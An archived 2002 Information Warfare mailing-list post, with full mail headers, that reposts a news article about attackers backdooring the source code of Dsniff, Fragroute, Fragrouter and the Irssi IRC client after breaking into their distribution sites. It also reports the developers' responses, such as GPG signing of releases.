[iwar] [fc:Download.Sites.Hacked,.Source.Code.Backdoored]

From: Fred Cohen (fc@all.net)
Date: 2002-06-04 07:25:19


Return-Path: <sentto-279987-4759-1023200548-fc=all.net@returns.groups.yahoo.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 [204.181.12.215] by localhost with POP3 (fetchmail-5.7.4) for fc@localhost (single-drop); Tue, 04 Jun 2002 07:26:07 -0700 (PDT)
Received: (qmail 9124 invoked by uid 510); 4 Jun 2002 14:22:04 -0000
Received: from n26.grp.scd.yahoo.com (66.218.66.82) by all.net with SMTP; 4 Jun 2002 14:22:04 -0000
X-eGroups-Return: sentto-279987-4759-1023200548-fc=all.net@returns.groups.yahoo.com
Received: from [66.218.67.197] by n26.grp.scd.yahoo.com with NNFMP; 04 Jun 2002 14:22:31 -0000
X-Sender: fc@red.all.net
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-8_0_3_2); 4 Jun 2002 14:22:28 -0000
Received: (qmail 1816 invoked from network); 4 Jun 2002 14:22:28 -0000
Received: from unknown (66.218.66.216) by m4.grp.scd.yahoo.com with QMQP; 4 Jun 2002 14:22:28 -0000
Received: from unknown (HELO red.all.net) (12.232.72.152) by mta1.grp.scd.yahoo.com with SMTP; 4 Jun 2002 14:22:27 -0000
Received: (from fc@localhost) by red.all.net (8.11.2/8.11.2) id g54EPJd06319 for iwar@onelist.com; Tue, 4 Jun 2002 07:25:19 -0700
Message-Id: <200206041425.g54EPJd06319@red.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL3]
From: Fred Cohen <fc@all.net>
X-Yahoo-Profile: fcallnet
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Tue, 4 Jun 2002 07:25:19 -0700 (PDT)
Subject: [iwar] [fc:Download.Sites.Hacked,.Source.Code.Backdoored]
Reply-To: iwar@yahoogroups.com
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Spam-Status: No, hits=0.0 required=5.0 tests=DIFFERENT_REPLY_TO version=2.20
X-Spam-Level: 

Download Sites Hacked, Source Code Backdoored

The popular open-source security tool Fragroute is bugged in plain sight by
unknown hackers, who may have struck before.
By Brian McWilliams, Jun 3 2002 4:37PM

When source code to a relatively obscure, Unix-based Internet relay chat
(IRC) client was reported to be "backdoored" last month, security
professionals collectively yawned.

But last week, when three popular network security programs were reported to
be similarly compromised, security experts sat up and took notice.

Now, it appears that the two hacking incidents may have been related.

According to program developer Dug Song, the source code to the Dsniff,
Fragroute, and Fragrouter security tools was contaminated on May 17th after
an attacker gained unauthorized access to his site, Monkey.org.

In an interview today, Song said affected users are being contacted, but he
declined to provide details of the site compromise, citing an ongoing
investigation.

When installed on a Unix-based machine, the modified programs open a
backdoor accessible to a remote server hosted by RCN Corporation, according
to an excerpt of the contaminated Fragroute program posted Friday to Bugtraq
by Anders Nordby of the Norwegian Unix User Group.

In another posting to the Bugtraq mailing list last Friday, Song reported
that nearly 2,000 copies of the booby-trapped security programs were
downloaded by unsuspecting Internet users before the malicious code was
discovered May 24th. Only 800 of the downloads were from Unix-based
machines, according to Song.

Song's subsequent Bugtraq message said that intruders planted the
contaminated code at Monkey.org after successfully penetrating a machine
operated by one of the site's administrators. The attackers exploited
"client-side hole that produced a shell to one of the local admin's
accounts," wrote Song in his message.

The exploit code planted at Monkey.org was nearly identical to a backdoor
program that was recently slipped by attackers into the source code of the
Irssi IRC chat client for Unix.

According to a notice posted May 25th at Irssi.org, someone "cracked" the
distribution site for the IRC program in mid-March and altered a
configuration script to include the back door.

New Precautions Implemented
Installing the compromised Irssi program provided a remote server hosted by
FastQ Communications with full shell access to the target machine, said the
notice. Irssi's developer, Timo Sirainen, was not immediately available for
comment.

Today, the Web server at the Internet protocol address listed in the
backdoored Irssi code returned the message: "All your base are belong to
us."

Meanwhile, Unknown.nu, the collocated server listed in the backdoored
Monkey.org code, today displayed the home of the Niuean Pop Cultural
Archive.

When contacted by SecurityFocus Online, the site's administrator, Kim
Scarborough, said he was unaware that the machine had been used by the
Monkey.org remote exploit.

Scarborough reported that he completely reinstalled the server's system
software, including the FreeBSD operating system, on May 30th after
discovering evidence that someone had hacked into it.

According to Scarborough, he had installed the Irssi chat client on the
machine around May 17th at the request of a user.

The two security incidents have forced authors of the affected programs to
implement new measures to insure the authenticity of their downloadable
code.

According to a page at Irssi describing the backdoor, new releases will be
signed with the GPG encryption tool, and the author will periodically review
the programs for changes.

Song said that Monkey.org has implemented technology to restrict user
sessions, and that he is considering adding digital signatures to software
distributed at the site.

------------------------ Yahoo! Groups Sponsor ---------------------~-->
Tied to your PC? Cut Loose and
Stay connected with Yahoo! Mobile
http://us.click.yahoo.com/QBCcSD/o1CEAA/sXBHAA/kgFolB/TM
---------------------------------------------------------------------~->

------------------
http://all.net/ 

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 



This archive was generated by hypermail 2.1.2 : 2003-08-24 02:46:32 PDT